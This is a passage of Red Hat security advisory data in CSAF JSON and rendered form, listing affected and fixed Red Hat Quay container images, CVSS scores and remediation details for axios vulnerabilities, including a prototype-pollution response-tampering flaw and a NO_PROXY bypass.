            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: NO_PROXY bypass via crafted URL"
    },
    {
      "cve": "CVE-2026-42044",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-04-24T19:01:13.418725+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461624"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a widely used HTTP client. This vulnerability, known as a Prototype Pollution \"Gadget\" attack, allows a remote attacker to subtly alter JSON API responses. By manipulating a specific function, an attacker can selectively modify data within these responses. This could lead to significant security breaches, including unauthorized privilege escalation, fraudulent balance manipulation, or bypassing critical authorization checks.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Invisible JSON Response Tampering via Prototype Pollution Gadget",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42044"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461624",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461624"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42044",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42044"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42044",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42044"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-3w6x-2g7m-8v23",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-3w6x-2g7m-8v23"
        }
      ],
      "release_date": "2026-04-24T17:49:49.517000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-26T17:12:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11458",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:21017"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: Invisible JSON Response Tampering via Prototype Pollution Gadget"
    }
  ]
}

RHSA-2026:22465

Vulnerability from csaf_redhat - Published: 2026-06-02 13:10 - Updated: 2026-06-30 15:25

Summary

Red Hat Security Advisory: Red Hat Quay 3.17.2

Severity

Important

Notes

Topic: Red Hat Quay 3.17.2 is now available with bug fixes.

Details: Quay 3.17.2

CVE-2025-62718

7.0 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L

CWE-1289 - Improper Validation of Unsafe Equivalence in Input

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64	—	Vendor Fix fix Workaround

Known not affected 27 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x	—	Workaround
